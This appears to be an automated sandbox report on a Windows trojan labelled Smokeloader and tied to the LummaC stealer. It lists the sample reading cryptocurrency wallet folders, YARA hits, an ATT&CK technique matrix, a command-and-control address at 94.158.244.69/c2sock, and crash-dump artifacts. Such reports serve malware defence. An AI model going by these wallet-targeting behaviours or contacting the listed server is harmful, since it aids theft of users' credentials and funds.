                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: Yara matchFile source: Process Memory Space: g1kWKm20Z5.exe PID: 1352, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.3.g1kWKm20Z5.exe.23a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g1kWKm20Z5.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.g1kWKm20Z5.exe.23a0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g1kWKm20Z5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1693318740.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3613161605.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: g1kWKm20Z5.exe PID: 1352, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                    Native API
                    1
                    LSASS Driver
                    1
                    Process Injection
                    32
                    Virtualization/Sandbox Evasion
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading
                    1
                    LSASS Driver
                    1
                    Process Injection
                    LSASS Memory471
                    Security Software Discovery
                    Remote Desktop Protocol31
                    Data from Local System
                    1
                    Non-Application Layer Protocol
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    Security Account Manager32
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive11
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS2
                    Process Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Software Packing
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem113
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    g1kWKm20Z5.exe89%ReversingLabsWin32.Trojan.Smokeloader
                    g1kWKm20Z5.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://94.158.244.69/c2sock60%Avira URL Cloudsafe
                    http://94.158.244.69/c2sock30%Avira URL Cloudsafe
                    http://94.158.244.69/V0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sockj0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sockh0%Avira URL Cloudsafe
                    http://94.158.244.69/l0%Avira URL Cloudsafe
                    http://94.158.244.69/D0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sock?0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sockMY0%Avira URL Cloudsafe
                    http://94.158.244.69/C0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sockM0%Avira URL Cloudsafe
                    http://94.158.244.69/H0%Avira URL Cloudsafe
                    http://94.158.244.69/Q0%Avira URL Cloudsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://94.158.244.69/c2sockfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://94.158.244.69/c2sock6g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/chrome_newtabg1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://94.158.244.69/c2sock3g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/ac/?q=g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icog1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://94.158.244.69/Vg1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://94.158.244.69/c2sockjg1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://94.158.244.69/c2sockMYg1kWKm20Z5.exe, 00000000.00000002.3616223948.0000000003348000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://94.158.244.69/c2sockhg1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://crl.rootca1.amazontrust.com/rootca1.crl0g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://upx.sf.netAmcache.hve.7.drfalse
                                  high
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://ocsp.rootca1.amazontrust.com0:g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016g1kWKm20Z5.exe, 00000000.00000003.2171988651.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17g1kWKm20Z5.exe, 00000000.00000003.2171988651.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://94.158.244.69/c2sock?g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000990000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.ecosia.org/newtab/g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://94.158.244.69/lg1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3612917620.00000000008F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brg1kWKm20Z5.exe, 00000000.00000002.3619351891.0000000003BD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://ac.ecosia.org/autocomplete?q=g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://94.158.244.69/Dg1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://94.158.244.69/Cg1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://94.158.244.69/c2sockMg1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://x1.c.lencr.org/0g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.i.lencr.org/0g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installg1kWKm20Z5.exe, 00000000.00000003.2171988651.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3613161605.00000000009C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchg1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://94.158.244.69/Qg1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://94.158.244.69/g1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesg1kWKm20Z5.exe, 00000000.00000003.2171988651.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000002.3613161605.00000000009C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.mozilla.org/products/firefoxgro.allg1kWKm20Z5.exe, 00000000.00000002.3619351891.0000000003BD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=g1kWKm20Z5.exe, 00000000.00000002.3613161605.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, g1kWKm20Z5.exe, 00000000.00000003.2171988651.0000000000A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://94.158.244.69/Hg1kWKm20Z5.exe, 00000000.00000002.3612917620.0000000000919000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  94.158.244.69
                                                                  unknownMoldova Republic of
                                                                  39798MIVOCLOUDMDtrue
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1555041
                                                                  Start date and time:2024-11-13 10:50:09 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 59s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:9
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:g1kWKm20Z5.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:6b3ef3a90ba62f467b95d06765ab128bfec21ea012fd4f1e0927ca0d09169d86.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@2/5@0/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 95%
                                                                  • Number of executed functions: 59
                                                                  • Number of non-executed functions: 104
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240s for sample files taking high CPU consumption
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: g1kWKm20Z5.exe
                                                                  TimeTypeDescription
                                                                  04:54:14API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  94.158.244.69RX7nieXlNm.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69/c2sock
                                                                  5M5e9srxkE.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69/c2sock
                                                                  dV01QsYySM.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69/c2sock
                                                                  BeO2C8S5Ly.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69/c2sock
                                                                  ToNaCrWjm7.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69/c2sock
                                                                  IVN6n1kO22.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69/c2sock
                                                                  Mc8s3us2xa.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69/c2sock
                                                                  SMZP2H8p7i.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69/c2sock
                                                                  qh0kepGznl.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69/c2sock
                                                                  No context
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  MIVOCLOUDMDRX7nieXlNm.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69
                                                                  5M5e9srxkE.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69
                                                                  dV01QsYySM.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69
                                                                  BeO2C8S5Ly.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69
                                                                  ToNaCrWjm7.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69
                                                                  IVN6n1kO22.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69
                                                                  Mc8s3us2xa.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69
                                                                  SMZP2H8p7i.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69
                                                                  qh0kepGznl.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 94.158.244.69
                                                                  WindowsUPD.ps1Get hashmaliciousUnknownBrowse
                                                                  • 94.158.244.69
                                                                  No context
                                                                  No context
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.8418074565782038
                                                                  Encrypted:false
                                                                  SSDEEP:96:0J4RJcFrBtQs8hc27Z9uQXIDcQvc6PcEfcw3/b+HbHg/PB6HeaZFEOyKZoxm6J+f:3RSpBtQt0RLVsjxyzuiFZZ24IO8P
                                                                  MD5:F31165B79C97B86DFFF48EA97E6F7D5C
                                                                  SHA1:DC8ED85DCE916F9AA5D8D16BACD1E5D1A6C8CD9A
                                                                  SHA-256:6555CA4E6F598004E4D51DB162587C84F420D0247C1A115A095E8E550AD69E41
                                                                  SHA-512:FED5DC03A32E6D0166B81E94EBB4FBA08E84DC835BFA5760EB14628E69E0D6F95A70F1D22EA005205AE5E1C1A1A445DA3DE55CE8C2BDECE440D718327299A9E1
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.9.6.5.2.3.5.5.4.3.3.1.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.9.6.5.2.3.5.9.4.9.5.7.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.c.e.0.b.b.0.-.e.0.7.6.-.4.5.1.1.-.a.7.3.b.-.9.c.a.c.c.3.9.9.2.6.9.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.5.a.f.1.2.9.-.f.e.7.7.-.4.a.6.6.-.9.a.f.b.-.3.1.e.9.f.7.5.f.d.d.b.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.1.k.W.K.m.2.0.Z.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.4.8.-.0.0.0.1.-.0.0.1.4.-.d.5.6.d.-.8.2.8.c.b.1.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.1.d.4.a.6.2.1.8.5.2.9.4.7.b.3.c.8.e.1.f.2.7.5.8.5.1.b.b.d.4.3.0.0.0.0.f.f.f.f.!.0.0.0.0.a.2.d.7.2.2.7.2.0.5.6.5.a.b.8.6.5.9.c.0.6.6.a.a.f.6.9.3.f.5.b.2.a.d.8.f.b.3.d.3.!.g.1.k.W.K.m.2.0.Z.5...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 15 streams, Wed Nov 13 09:53:55 2024, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):40132
                                                                  Entropy (8bit):2.5044018772735157
                                                                  Encrypted:false
                                                                  SSDEEP:192:0Srk7X8jwkvHgO2hCy/wnuYg/UKrtY5F3+VVnx9Tb7yP/JBR28s:31jJvX2hCtnuYMrtY5cnx9jaPns
                                                                  MD5:AE75A8DF9791E31C863AA8D986348F05
                                                                  SHA1:61837D2CF55B7BCB19638C89DF654FCAADECAA12
                                                                  SHA-256:D5BE6679C0E14C10B082A91131E7A6047C59D1E3B8F668CF3A606906B27585E2
                                                                  SHA-512:5FD70E051036F27BF74EC90159B5A47E0758AC39A9A4BB6498F89A9F87FD95975123251F0D58D3D9A4463FCB1C382AC611A67A73271602FCFC6ADEB521663A9D
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:MDMP..a..... .......3w4g............4...............H.......<...........T...."..........`.......8...........T...........P=..t_..........L...........8...............................................................................eJ..............GenuineIntel............T.......H....v4gM............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8334
                                                                  Entropy (8bit):3.698588280417024
                                                                  Encrypted:false
                                                                  SSDEEP:192:R6l7wVeJt46Iv6Y9tSU8cgmfvNpDT89bTBsfVS1xm:R6lXJC6Iv6YHSU8cgmfv8T6fwa
                                                                  MD5:C1407B466A6CDF6F7938363AFA9D3338
                                                                  SHA1:7A19203B0982B7ADE05352779138B60F7D6EDB93
                                                                  SHA-256:1930321C6E2AA04BBA2BF5823BBCD541F530EE65DBEEA5FAF13144B6F22E5961
                                                                  SHA-512:116A8EEB6CD712EC1945A97ED5AC6E95578F5D55172424DDEB7EEDC635126BFD99AACF902E88572AD8E9E215E4F0D4BE4379519CBCAD7050357276E260862BB1
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.5.2.<./.P.i.
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4579
                                                                  Entropy (8bit):4.466967220325166
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwWl8zsrJg77aI9liWpW8VYZYm8M4JVW+oFLhd+q8vgimoHbE+lWd:uIjfFI7fj7VtJ8+IfWzmoHbE+lWd
                                                                  MD5:C3965C8AC1FB1101B4C6B205BD582C1A
                                                                  SHA1:2207B1933FFE370EB42976E4522FA7F5905929EA
                                                                  SHA-256:E448414639D692F78D7343186E7A4CBB24BFAA2A53EE9B6D9271101B8AA78193
                                                                  SHA-512:2498B32E79E54C0411F8282ED36C1ED11382500A5F82081F78F2FF52327C78C688F45CEDE4158347F80DA2BDA63C25D807FC19E893393B2A1542F01EDDF502D7
                                                                  Malicious:false
                                                                  Reputation:low
